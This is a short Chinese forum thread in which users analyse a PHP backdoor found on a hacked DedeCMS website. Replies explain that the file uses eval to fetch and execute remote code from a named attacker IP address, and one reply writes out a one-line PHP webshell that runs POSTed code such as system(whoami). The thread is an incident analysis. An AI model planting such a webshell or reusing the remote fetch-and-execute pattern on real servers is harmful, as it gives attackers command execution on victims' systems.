导航

服务器被搞的,求分析这个东西是干嘛的

#1
8月30日被搞了,网站文件被修改,然后发现一个php文件<
2021-09-04
#2
利用eval 获取该地址内容 http://139.162.20.171/dhooL3Ohzle/bothsads/exec.php  继续执行远程代码
一起交流学习
2021-09-05
#3
这种一般用于黑产,远程获取内容执行,劫持居多!
2021-09-06
#4
eval(file_get_contents($file)) 本地包含
比如:
<?php

@eval(file_get_contents('php://input'))

?>
接收post数据,可以构造system(whoami),直接执行代码,这里他只不过是远程执行了一个exec.php。
$_SERVER['SERVER_NAME'] 获取主机名
['runphp']="yes" dedecms里运行php的一个判断
总结一下就是z数组的第四个index值=yes的时候,就执行var_dump($z)

评分记录

2021-09-06
#5
回复 4# playbyte
正解,就是dede站被搞了。现在还在反日溯源